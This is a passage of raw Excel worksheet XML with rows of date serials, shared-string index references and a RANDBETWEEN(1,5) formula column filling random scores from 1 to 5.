      </c>
      <c r="C4592" t="s">
        <v>10</v>
      </c>
      <c r="D4592" t="s">
        <v>86</v>
      </c>
      <c r="E4592" s="2" t="s">
        <v>4397</v>
      </c>
      <c r="F4592">
        <f t="shared" ca="1" si="71"/>
        <v>5</v>
      </c>
    </row>
    <row r="4593" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4593" s="1">
        <v>43473.51357638889</v>
      </c>
      <c r="B4593" t="s">
        <v>5</v>
      </c>
      <c r="C4593" t="s">
        <v>41</v>
      </c>
      <c r="E4593" t="s">
        <v>4398</v>
      </c>
      <c r="F4593">
        <f t="shared" ca="1" si="71"/>
        <v>5</v>
      </c>
    </row>
    <row r="4594" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A4594" s="1">
        <v>43473.511655092596</v>
      </c>
      <c r="B4594" t="s">
        <v>19</v>
      </c>
      <c r="C4594" t="s">
        <v>10</v>
      </c>
      <c r="D4594" t="s">
        <v>33</v>
      </c>
      <c r="E4594" s="2" t="s">
        <v>4399</v>
      </c>
      <c r="F4594">
        <f t="shared" ca="1" si="71"/>
        <v>1</v>
      </c>
    </row>
    <row r="4595" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4595" s="1">
        <v>43473.508125</v>
      </c>
      <c r="B4595" t="s">
        <v>13</v>
      </c>
      <c r="C4595" t="s">
        <v>10</v>
      </c>
      <c r="D4595" t="s">
        <v>17</v>
      </c>
      <c r="E4595" t="s">
        <v>4400</v>
      </c>
      <c r="F4595">
        <f t="shared" ca="1" si="71"/>
        <v>2</v>
      </c>
    </row>
    <row r="4596" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4596" s="1">
        <v>43473.489606481482</v>
      </c>
      <c r="B4596" t="s">
        <v>5</v>
      </c>
      <c r="C4596" t="s">
        <v>10</v>
      </c>
      <c r="D4596" t="s">
        <v>17</v>
      </c>
      <c r="E4596" t="s">
        <v>4401</v>
      </c>
      <c r="F4596">
        <f t="shared" ca="1" si="71"/>
        <v>5</v>
      </c>
    </row>
    <row r="4597" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4597" s="1">
        <v>43473.487800925926</v>
      </c>
      <c r="B4597" t="s">
        <v>13</v>
      </c>
      <c r="C4597" t="s">
        <v>10</v>
      </c>
      <c r="D4597" t="s">
        <v>17</v>
      </c>
      <c r="E4597" t="s">
        <v>4402</v>
      </c>
      <c r="F4597">
        <f t="shared" ca="1" si="71"/>
        <v>3</v>
      </c>
    </row>
    <row r="4598" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4598" s="1">
        <v>43473.487581018519</v>
      </c>
      <c r="B4598" t="s">
        <v>19</v>
      </c>
      <c r="C4598" t="s">
        <v>10</v>
      </c>
      <c r="D4598" t="s">
        <v>89</v>
      </c>
      <c r="E4598" t="s">
        <v>4403</v>
      </c>
      <c r="F4598">
        <f t="shared" ca="1" si="71"/>
        <v>4</v>
      </c>
    </row>
    <row r="4599" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4599" s="1">
        <v>43473.481956018521</v>
      </c>
      <c r="B4599" t="s">
        <v>13</v>
      </c>
      <c r="C4599" t="s">
        <v>260</v>
      </c>
      <c r="E4599" t="s">
        <v>4404</v>
      </c>
      <c r="F4599">
        <f t="shared" ca="1" si="71"/>
        <v>3</v>
      </c>
    </row>
    <row r="4600" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4600" s="1">
        <v>43473.471550925926</v>
      </c>
      <c r="B4600" t="s">
        <v>1305</v>
      </c>
      <c r="C4600" t="s">
        <v>260</v>
      </c>
      <c r="E4600" t="s">
        <v>4405</v>
      </c>
      <c r="F4600">
        <f t="shared" ca="1" si="71"/>
        <v>4</v>
      </c>
    </row>
    <row r="4601" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4601" s="1">
        <v>43473.471238425926</v>
      </c>
      <c r="B4601" t="s">
        <v>1305</v>
      </c>
      <c r="C4601" t="s">
        <v>48</v>
      </c>
      <c r="E4601" t="s">
        <v>4406</v>
      </c>
      <c r="F4601">
        <f t="shared" ca="1" si="71"/>
        <v>4</v>
      </c>
    </row>
    <row r="4602" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4602" s="1">
        <v>43473.467719907407</v>
      </c>
      <c r="B4602" t="s">
        <v>13</v>
      </c>
      <c r="C4602" t="s">
        <v>10</v>
      </c>
      <c r="D4602" t="s">
        <v>263</v>
      </c>
      <c r="E4602" t="s">
        <v>4407</v>
      </c>
      <c r="F4602">
        <f t="shared" ca="1" si="71"/>
        <v>1</v>
      </c>
    </row>
    <row r="4603" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4603" s="1">
        <v>43473.464699074073</v>
      </c>
      <c r="B4603" t="s">
        <v>13</v>
      </c>
      <c r="C4603" t="s">
        <v>10</v>
      </c>
      <c r="D4603" t="s">
        <v>381</v>
      </c>
      <c r="E4603" t="s">
        <v>4408</v>
      </c>
      <c r="F4603">
        <f t="shared" ca="1" si="71"/>
        <v>2</v>
      </c>
    </row>
    <row r="4604" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4604" s="1">
        <v>43473.458553240744</v>
      </c>
      <c r="B4604" t="s">
        <v>19</v>
      </c>
      <c r="C4604" t="s">
        <v>10</v>
      </c>
      <c r="D4604" t="s">
        <v>17</v>
      </c>
      <c r="E4604" s="2" t="s">
        <v>4409</v>
      </c>
      <c r="F4604">
        <f t="shared" ca="1" si="71"/>
        <v>3</v>
      </c>
    </row>
    <row r="4605" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4605" s="1">
        <v>43473.453993055555</v>
      </c>
      <c r="B4605" t="s">
        <v>5</v>
      </c>
      <c r="C4605" t="s">
        <v>173</v>
      </c>
      <c r="E4605" t="s">
        <v>4410</v>
      </c>
      <c r="F4605">
        <f t="shared" ca="1" si="71"/>
        <v>5</v>
      </c>
    </row>
    <row r="4606" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A4606" s="1">
        <v>43473.452835648146</v>
      </c>
      <c r="B4606" t="s">
        <v>13</v>
      </c>
      <c r="C4606" t="s">
        <v>71</v>
      </c>
      <c r="E4606" s="2" t="s">
        <v>4411</v>
      </c>
      <c r="F4606">
        <f t="shared" ca="1" si="71"/>
        <v>3</v>
      </c>
    </row>
    <row r="4607" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4607" s="1">
        <v>43473.437256944446</v>
      </c>
      <c r="B4607" t="s">
        <v>5</v>
      </c>
      <c r="C4607" t="s">
        <v>226</v>
      </c>
      <c r="F4607">
        <f t="shared" ca="1" si="71"/>
        <v>1</v>
      </c>
    </row>
    <row r="4608" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4608" s="1">
        <v>43473.435555555552</v>
      </c>
      <c r="B4608" t="s">
        <v>19</v>
      </c>
      <c r="C4608" t="s">
        <v>10</v>
      </c>
      <c r="D4608" t="s">
        <v>494</v>
      </c>
      <c r="E4608" s="2" t="s">
        <v>4412</v>
      </c>
      <c r="F4608">
        <f t="shared" ca="1" si="71"/>
        <v>5</v>
      </c>
    </row>
    <row r="4609" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4609" s="1">
        <v>43473.428287037037</v>
      </c>
      <c r="B4609" t="s">
        <v>13</v>
      </c>
      <c r="C4609" t="s">
        <v>10</v>
      </c>
      <c r="D4609" t="s">
        <v>632</v>
      </c>
      <c r="E4609" s="2" t="s">
        <v>4413</v>
      </c>
      <c r="F4609">
        <f t="shared" ca="1" si="71"/>
        <v>5</v>
      </c>
    </row>
    <row r="4610" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4610" s="1">
        <v>43473.407337962963</v>
      </c>
      <c r="B4610" t="s">
        <v>19</v>
      </c>
      <c r="C4610" t="s">
        <v>10</v>
      </c>
      <c r="D4610" t="s">
        <v>17</v>
      </c>
      <c r="E4610" t="s">
        <v>4414</v>
      </c>
      <c r="F4610">
        <f t="shared" ref="F4610:F4673" ca="1" si="72">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4611" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4611" s="1">
        <v>43473.401574074072</v>
      </c>
      <c r="B4611" t="s">
        <v>19</v>
      </c>
      <c r="C4611" t="s">
        <v>6</v>
      </c>
      <c r="F4611">
        <f t="shared" ca="1" si="72"/>
        <v>5</v>
      </c>
    </row>
    <row r="4612" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4612" s="1">
        <v>43473.401319444441</v>
      </c>
      <c r="B4612" t="s">
        <v>5</v>
      </c>
      <c r="C4612" t="s">
        <v>6</v>
      </c>
      <c r="D4612" t="s">
        <v>25</v>
      </c>
      <c r="F4612">
        <f t="shared" ca="1" si="72"/>
        <v>4</v>
      </c>
    </row>
    <row r="4613" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4613" s="1">
        <v>43473.40115740741</v>
      </c>
      <c r="B4613" t="s">
        <v>19</v>
      </c>
      <c r="C4613" t="s">
        <v>6</v>
      </c>
      <c r="D4613" t="s">
        <v>25</v>
      </c>
      <c r="F4613">
        <f t="shared" ca="1" si="72"/>
        <v>1</v>
      </c>
    </row>
    <row r="4614" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4614" s="1">
        <v>43473.400625000002</v>
      </c>
      <c r="B4614" t="s">
        <v>19</v>
      </c>
      <c r="C4614" t="s">
        <v>6</v>
      </c>
      <c r="F4614">
        <f t="shared" ca="1" si="72"/>
        <v>2</v>
      </c>
    </row>
    <row r="4615" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4615" s="1">
        <v>43473.400451388887</v>
      </c>
      <c r="B4615" t="s">
        <v>5</v>
      </c>
      <c r="C4615" t="s">
        <v>6</v>
      </c>
      <c r="D4615" t="s">
        <v>25</v>
      </c>
      <c r="F4615">
        <f t="shared" ca="1" si="72"/>
        <v>4</v>
      </c>
    </row>
    <row r="4616" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4616" s="1">
        <v>43473.400266203702</v>
      </c>
      <c r="B4616" t="s">
        <v>19</v>
      </c>
      <c r="C4616" t="s">
        <v>6</v>
      </c>
      <c r="F4616">
        <f t="shared" ca="1" si="72"/>
        <v>2</v>
      </c>
    </row>
    <row r="4617" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4617" s="1">
        <v>43473.399872685186</v>
      </c>
      <c r="B4617" t="s">
        <v>19</v>
      </c>
      <c r="C4617" t="s">
        <v>6</v>
      </c>
      <c r="F4617">
        <f t="shared" ca="1" si="72"/>
        <v>2</v>
      </c>
    </row>
    <row r="4618" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4618" s="1">
        <v>43473.399664351855</v>
      </c>
      <c r="B4618" t="s">
        <v>19</v>
      </c>
      <c r="C4618" t="s">
        <v>6</v>
      </c>
      <c r="D4618" t="s">
        <v>25</v>
      </c>
      <c r="F4618">
        <f t="shared" ca="1" si="72"/>
        <v>2</v>
      </c>
    </row>
    <row r="4619" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4619" s="1">
        <v>43473.399293981478</v>
      </c>
      <c r="B4619" t="s">
        <v>19</v>
      </c>
      <c r="C4619" t="s">
        <v>43</v>
      </c>
      <c r="E4619" t="s">
        <v>4415</v>
      </c>
      <c r="F4619">
        <f t="shared" ca="1" si="72"/>
        <v>3</v>
      </c>
    </row>
    <row r="4620" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4620" s="1">
        <v>43473.395185185182</v>
      </c>
      <c r="B4620" t="s">
        <v>5</v>
      </c>
      <c r="C4620" t="s">
        <v>10</v>
      </c>
      <c r="D4620" t="s">
        <v>817</v>
      </c>
      <c r="E4620" s="2" t="s">
        <v>4416</v>
      </c>
      <c r="F4620">
        <f t="shared" ca="1" si="72"/>
        <v>1</v>
      </c>
    </row>
    <row r="4621" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4621" s="1">
        <v>43473.394629629627</v>
      </c>
      <c r="B4621" t="s">
        <v>19</v>
      </c>
      <c r="C4621" t="s">
        <v>10</v>
      </c>
      <c r="D4621" t="s">
        <v>271</v>
      </c>
      <c r="E4621" t="s">
        <v>4417</v>
      </c>
      <c r="F4621">
        <f t="shared" ca="1" si="72"/>
        <v>4</v>
      </c>
    </row>
    <row r="4622" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4622" s="1">
        <v>43473.39402777778</v>
      </c>
      <c r="B4622" t="s">
        <v>35</v>
      </c>
      <c r="C4622" t="s">
        <v>6</v>
      </c>
      <c r="D4622" t="s">
        <v>25</v>
      </c>
      <c r="E4622" t="s">
        <v>32</v>
      </c>
      <c r="F4622">
        <f t="shared" ca="1" si="72"/>
        <v>3</v>
      </c>
    </row>
    <row r="4623" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4623" s="1">
        <v>43473.376458333332</v>
      </c>
      <c r="B4623" t="s">
        <v>19</v>
      </c>
      <c r="C4623" t="s">
        <v>173</v>
      </c>
      <c r="E4623" s="2" t="s">
        <v>4418</v>
      </c>
      <c r="F4623">
        <f t="shared" ca="1" si="72"/>
        <v>3</v>
      </c>
    </row>
    <row r="4624" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4624" s="1">
        <v>43473.372812499998</v>
      </c>
      <c r="B4624" t="s">
        <v>13</v>
      </c>
      <c r="C4624" t="s">
        <v>60</v>
      </c>
      <c r="E4624" t="s">
        <v>4419</v>
      </c>
      <c r="F4624">
        <f t="shared" ca="1" si="72"/>
        <v>5</v>
      </c>
    </row>
    <row r="4625" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4625" s="1">
        <v>43473.370243055557</v>
      </c>
      <c r="B4625" t="s">
        <v>19</v>
      </c>
      <c r="C4625" t="s">
        <v>10</v>
      </c>
      <c r="D4625" t="s">
        <v>33</v>
      </c>
      <c r="E4625" t="s">
        <v>4420</v>
      </c>
      <c r="F4625">
        <f t="shared" ca="1" si="72"/>
        <v>4</v>
      </c>
    </row>
    <row r="4626" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4626" s="1">
        <v>43473.354780092595</v>
      </c>
      <c r="B4626" t="s">
        <v>5</v>
      </c>
      <c r="C4626" t="s">
        <v>623</v>
      </c>
      <c r="E4626" s="2" t="s">
        <v>4421</v>
      </c>
      <c r="F4626">
        <f t="shared" ca="1" si="72"/>
        <v>1</v>
      </c>
    </row>
    <row r="4627" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4627" s="1">
        <v>43473.353819444441</v>
      </c>
      <c r="B4627" t="s">
        <v>5</v>
      </c>
      <c r="C4627" t="s">
        <v>318</v>
      </c>
      <c r="E4627" s="2" t="s">
        <v>4422</v>
      </c>
      <c r="F4627">
        <f t="shared" ca="1" si="72"/>
        <v>5</v>
      </c>
    </row>
    <row r="4628" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4628" s="1">
        <v>43473.3358912037</v>
      </c>
      <c r="B4628" t="s">
        <v>19</v>
      </c>
      <c r="C4628" t="s">
        <v>17</v>
      </c>
      <c r="E4628" s="2" t="s">
        <v>4423</v>
      </c>
      <c r="F4628">
        <f t="shared" ca="1" si="72"/>
        <v>5</v>
      </c>
    </row>
    <row r="4629" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A4629" s="1">
        <v>43473.332719907405</v>
      </c>
      <c r="B4629" t="s">
        <v>35</v>
      </c>
      <c r="C4629" t="s">
        <v>6</v>
      </c>
      <c r="E4629" s="2" t="s">
        <v>4424</v>
      </c>
      <c r="F4629">
        <f t="shared" ca="1" si="72"/>
        <v>1</v>
      </c>
    </row>
    <row r="4630" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4630" s="1">
        <v>43473.320902777778</v>
      </c>
      <c r="B4630" t="s">
        <v>5</v>
      </c>
      <c r="C4630" t="s">
        <v>41</v>
      </c>
      <c r="E4630" s="2" t="s">
        <v>4425</v>
      </c>
      <c r="F4630">
        <f t="shared" ca="1" si="72"/>
        <v>4</v>
      </c>
    </row>
    <row r="4631" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A4631" s="1">
        <v>43473.290648148148</v>
      </c>
      <c r="B4631" t="s">
        <v>19</v>
      </c>
      <c r="C4631" t="s">
        <v>48</v>
      </c>
      <c r="E4631" s="2" t="s">
        <v>4426</v>
      </c>
      <c r="F4631">
        <f t="shared" ca="1" si="72"/>
        <v>2</v>
      </c>
    </row>
    <row r="4632" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4632" s="1">
        <v>43473.255104166667</v>
      </c>
      <c r="B4632" t="s">
        <v>5</v>
      </c>
      <c r="C4632" t="s">
        <v>41</v>
      </c>
      <c r="E4632" s="2" t="s">
        <v>4427</v>
      </c>
      <c r="F4632">
        <f t="shared" ca="1" si="72"/>
        <v>5</v>
      </c>
    </row>
    <row r="4633" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4633" s="1">
        <v>43473.250347222223</v>
      </c>
      <c r="B4633" t="s">
        <v>19</v>
      </c>
      <c r="C4633" t="s">
        <v>69</v>
      </c>
      <c r="E4633" s="2" t="s">
        <v>4428</v>
      </c>
      <c r="F4633">
        <f t="shared" ca="1" si="72"/>
        <v>1</v>
      </c>
    </row>
    <row r="4634" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A4634" s="1">
        <v>43473.222511574073</v>
      </c>
      <c r="B4634" t="s">
        <v>19</v>
      </c>
      <c r="C4634" t="s">
        <v>4429</v>
      </c>
      <c r="D4634" t="s">
        <v>23</v>
      </c>
      <c r="E4634" s="2" t="s">
        <v>4430</v>
      </c>
      <c r="F4634">
        <f t="shared" ca="1" si="72"/>
        <v>3</v>
      </c>
    </row>
    <row r="4635" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4635" s="1">
        <v>43473.199687499997</v>
      </c>
      <c r="B4635" t="s">
        <v>5</v>
      </c>
      <c r="C4635" t="s">
        <v>48</v>
      </c>
      <c r="E4635" t="s">
        <v>4431</v>
      </c>
      <c r="F4635">
        <f t="shared" ca="1" si="72"/>
        <v>1</v>
      </c>
    </row>
    <row r="4636" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A4636" s="1">
        <v>43473.199317129627</v>
      </c>
      <c r="B4636" t="s">
        <v>1305</v>
      </c>
      <c r="C4636" t="s">
        <v>408</v>
      </c>
      <c r="E4636" s="2" t="s">
        <v>4432</v>
      </c>
      <c r="F4636">
        <f t="shared" ca="1" si="72"/>
        <v>1</v>
      </c>
    </row>
    <row r="4637" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A4637" s="1">
        <v>43473.199247685188</v>
      </c>
      <c r="B4637" t="s">
        <v>1305</v>
      </c>
      <c r="C4637" t="s">
        <v>408</v>
      </c>
      <c r="E4637" s="2" t="s">
        <v>4432</v>
      </c>
      <c r="F4637">
        <f t="shared" ca="1" si="72"/>
        <v>4</v>
      </c>
    </row>
    <row r="4638" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4638" s="1">
        <v>43473.125081018516</v>
      </c>
      <c r="B4638" t="s">
        <v>5</v>
      </c>
      <c r="C4638" t="s">
        <v>41</v>
      </c>
      <c r="E4638" t="s">
        <v>4433</v>
      </c>
      <c r="F4638">
        <f t="shared" ca="1" si="72"/>
        <v>5</v>
      </c>
    </row>
    <row r="4639" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4639" s="1">
        <v>43473.080034722225</v>
      </c>
      <c r="B4639" t="s">
        <v>1305</v>
      </c>
      <c r="C4639" t="s">
        <v>253</v>
      </c>
      <c r="E4639" t="s">
        <v>4434</v>
      </c>
      <c r="F4639">
        <f t="shared" ca="1" si="72"/>
        <v>4</v>
      </c>
    </row>
    <row r="4640" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4640" s="1">
        <v>43473.024756944447</v>
      </c>
      <c r="B4640" t="s">
        <v>19</v>
      </c>
      <c r="C4640" t="s">
        <v>2108</v>
      </c>
      <c r="E4640" t="s">
        <v>3657</v>
      </c>
      <c r="F4640">
        <f t="shared" ca="1" si="72"/>
        <v>3</v>
      </c>
    </row>
    <row r="4641" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4641" s="1">
        <v>43473.019606481481</v>
      </c>
      <c r="B4641" t="s">
        <v>1305</v>
      </c>
      <c r="C4641" t="s">
        <v>41</v>
      </c>
      <c r="E4641" t="s">
        <v>4435</v>
      </c>
      <c r="F4641">
        <f t="shared" ca="1" si="72"/>
        <v>2</v>
      </c>
    </row>
    <row r="4642" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4642" s="1">
        <v>43472.897604166668</v>
      </c>
      <c r="B4642" t="s">
        <v>1305</v>
      </c>
      <c r="C4642" t="s">
        <v>222</v>
      </c>
      <c r="E4642" s="2" t="s">
        <v>4436</v>
      </c>
      <c r="F4642">
        <f t="shared" ca="1" si="72"/>
        <v>3</v>
      </c>
    </row>
    <row r="4643" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4643" s="1">
        <v>43472.870115740741</v>
      </c>
      <c r="B4643" t="s">
        <v>19</v>
      </c>
      <c r="C4643" t="s">
        <v>253</v>
      </c>
      <c r="E4643" s="2" t="s">
        <v>4437</v>
      </c>
      <c r="F4643">
        <f t="shared" ca="1" si="72"/>
        <v>2</v>
      </c>
    </row>
    <row r="4644" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4644" s="1">
        <v>43472.866284722222</v>
      </c>
      <c r="B4644" t="s">
        <v>1305</v>
      </c>
      <c r="C4644" t="s">
        <v>253</v>
      </c>
      <c r="E4644" t="s">
        <v>4438</v>
      </c>
      <c r="F4644">
        <f t="shared" ca="1" si="72"/>
        <v>3</v>
      </c>
    </row>
    <row r="4645" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A4645" s="1">
        <v>43472.815000000002</v>
      </c>
      <c r="B4645" t="s">
        <v>5</v>
      </c>
      <c r="C4645" t="s">
        <v>60</v>
      </c>
      <c r="E4645" s="2" t="s">
        <v>4439</v>
      </c>
      <c r="F4645">
        <f t="shared" ca="1" si="72"/>
        <v>2</v>
      </c>
    </row>
    <row r="4646" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4646" s="1">
        <v>43472.777870370373</v>
      </c>
      <c r="B4646" t="s">
        <v>19</v>
      </c>
      <c r="C4646" t="s">
        <v>10</v>
      </c>
      <c r="D4646" t="s">
        <v>6</v>
      </c>
      <c r="E4646" t="s">
        <v>4440</v>
      </c>
      <c r="F4646">
        <f t="shared" ca="1" si="72"/>
        <v>1</v>
      </c>
    </row>
    <row r="4647" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4647" s="1">
        <v>43472.763402777775</v>
      </c>
      <c r="B4647" t="s">
        <v>19</v>
      </c>
      <c r="C4647" t="s">
        <v>10</v>
      </c>
      <c r="D4647" t="s">
        <v>6</v>
      </c>
      <c r="E4647" t="s">
        <v>4441</v>
      </c>
      <c r="F4647">
        <f t="shared" ca="1" si="72"/>
        <v>5</v>
      </c>
    </row>
    <row r="4648" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4648" s="1">
        <v>43472.756967592592</v>
      </c>
      <c r="B4648" t="s">
        <v>19</v>
      </c>
      <c r="C4648" t="s">
        <v>10</v>
      </c>
      <c r="E4648" s="2" t="s">
        <v>4442</v>
      </c>
      <c r="F4648">
        <f t="shared" ca="1" si="72"/>
        <v>5</v>
      </c>
    </row>
    <row r="4649" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4649" s="1">
        <v>43472.748113425929</v>
      </c>
      <c r="B4649" t="s">
        <v>13</v>
      </c>
      <c r="C4649" t="s">
        <v>10</v>
      </c>
      <c r="D4649" t="s">
        <v>6</v>
      </c>
      <c r="E4649" t="s">
        <v>4443</v>
      </c>
      <c r="F4649">
        <f t="shared" ca="1" si="72"/>
        <v>4</v>
      </c>
    </row>
    <row r="4650" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A4650" s="1">
        <v>43472.746967592589</v>
      </c>
      <c r="B4650" t="s">
        <v>5</v>
      </c>
      <c r="C4650" t="s">
        <v>10</v>
      </c>
      <c r="D4650" t="s">
        <v>17</v>
      </c>
      <c r="E4650" s="2" t="s">
        <v>4444</v>
      </c>
      <c r="F4650">
        <f t="shared" ca="1" si="72"/>
        <v>5</v>
      </c>
    </row>
    <row r="4651" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A4651" s="1">
        <v>43472.74690972222</v>
      </c>
      <c r="B4651" t="s">
        <v>1305</v>
      </c>
      <c r="C4651" t="s">
        <v>720</v>
      </c>
      <c r="E4651" s="2" t="s">
        <v>4445</v>
      </c>
      <c r="F4651">
        <f t="shared" ca="1" si="72"/>
        <v>2</v>
      </c>
    </row>
    <row r="4652" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A4652" s="1">
        <v>43472.74664351852</v>
      </c>
      <c r="B4652" t="s">
        <v>35</v>
      </c>
      <c r="C4652" t="s">
        <v>10</v>
      </c>
      <c r="D4652" t="s">
        <v>36</v>
      </c>
      <c r="E4652" s="2" t="s">
        <v>4446</v>
      </c>
      <c r="F4652">
        <f t="shared" ca="1" si="72"/>
        <v>3</v>
      </c>
    </row>
    <row r="4653" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A4653" s="1">
        <v>43472.740624999999</v>
      </c>
      <c r="B4653" t="s">
        <v>35</v>
      </c>
      <c r="C4653" t="s">
        <v>10</v>
      </c>
      <c r="D4653" t="s">
        <v>6</v>
      </c>
      <c r="E4653" s="2" t="s">
        <v>4448</v>
      </c>
      <c r="F4653">
        <f t="shared" ca="1" si="72"/>
        <v>2</v>
      </c>
    </row>
    <row r="4654" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4654" s="1">
        <v>43472.740289351852</v>
      </c>
      <c r="B4654" t="s">
        <v>19</v>
      </c>
      <c r="C4654" t="s">
        <v>10</v>
      </c>
      <c r="D4654" t="s">
        <v>11</v>
      </c>
      <c r="E4654" t="s">
        <v>4449</v>
      </c>
      <c r="F4654">
        <f t="shared" ca="1" si="72"/>
        <v>4</v>
      </c>
    </row>
    <row r="4655" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4655" s="1">
        <v>43472.726238425923</v>
      </c>
      <c r="B4655" t="s">
        <v>1305</v>
      </c>
      <c r="C4655" t="s">
        <v>10</v>
      </c>
      <c r="D4655" t="s">
        <v>56</v>
      </c>
      <c r="E4655" s="2" t="s">
        <v>4450</v>
      </c>
      <c r="F4655">
        <f t="shared" ca="1" si="72"/>
        <v>5</v>
      </c>
    </row>
    <row r="4656" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A4656" s="1">
        <v>43472.706435185188</v>
      </c>
      <c r="B4656" t="s">
        <v>5</v>
      </c>
      <c r="C4656" t="s">
        <v>10</v>
      </c>
      <c r="D4656" t="s">
        <v>52</v>
      </c>
      <c r="E4656" s="2" t="s">
        <v>4451</v>
      </c>
      <c r="F4656">
        <f t="shared" ca="1" si="72"/>
        <v>2</v>
      </c>
    </row>
    <row r="4657" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4657" s="1">
        <v>43472.705925925926</v>
      </c>
      <c r="B4657" t="s">
        <v>19</v>
      </c>
      <c r="C4657" t="s">
        <v>10</v>
      </c>
      <c r="D4657" t="s">
        <v>381</v>
      </c>
      <c r="E4657" t="s">
        <v>4452</v>
      </c>
      <c r="F4657">
        <f t="shared" ca="1" si="72"/>
        <v>1</v>
      </c>
    </row>
    <row r="4658" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4658" s="1">
        <v>43472.683819444443</v>
      </c>
      <c r="B4658" t="s">
        <v>13</v>
      </c>
      <c r="C4658" t="s">
        <v>260</v>
      </c>
      <c r="E4658" t="s">
        <v>4453</v>
      </c>
      <c r="F4658">
        <f t="shared" ca="1" si="72"/>
        <v>3</v>
      </c>
    </row>
    <row r="4659" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4659" s="1">
        <v>43472.663321759261</v>
      </c>
      <c r="B4659" t="s">
        <v>19</v>
      </c>
      <c r="C4659" t="s">
        <v>10</v>
      </c>
      <c r="D4659" t="s">
        <v>80</v>
      </c>
      <c r="E4659" s="2" t="s">
        <v>4454</v>
      </c>
      <c r="F4659">
        <f t="shared" ca="1" si="72"/>
        <v>5</v>
      </c>
    </row>
    <row r="4660" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A4660" s="1">
        <v>43472.617812500001</v>
      </c>
      <c r="B4660" t="s">
        <v>19</v>
      </c>
      <c r="C4660" t="s">
        <v>6</v>
      </c>
      <c r="D4660" t="s">
        <v>25</v>
      </c>
      <c r="E4660" s="2" t="s">
        <v>4455</v>
      </c>
      <c r="F4660">
        <f t="shared" ca="1" si="72"/>
        <v>1</v>
      </c>
    </row>
    <row r="4661" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4661" s="1">
        <v>43472.596828703703</v>
      </c>
      <c r="C4661" t="s">
        <v>6</v>
      </c>
      <c r="D4661" t="s">
        <v>25</v>
      </c>
      <c r="F4661">
        <f t="shared" ca="1" si="72"/>
        <v>1</v>
      </c>
    </row>
    <row r="4662" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A4662" s="1">
        <v>43472.596400462964</v>
      </c>
      <c r="B4662" t="s">
        <v>5</v>
      </c>
      <c r="C4662" t="s">
        <v>43</v>
      </c>
      <c r="D4662" t="s">
        <v>312</v>
      </c>
      <c r="E4662" s="2" t="s">
        <v>4456</v>
      </c>
      <c r="F4662">
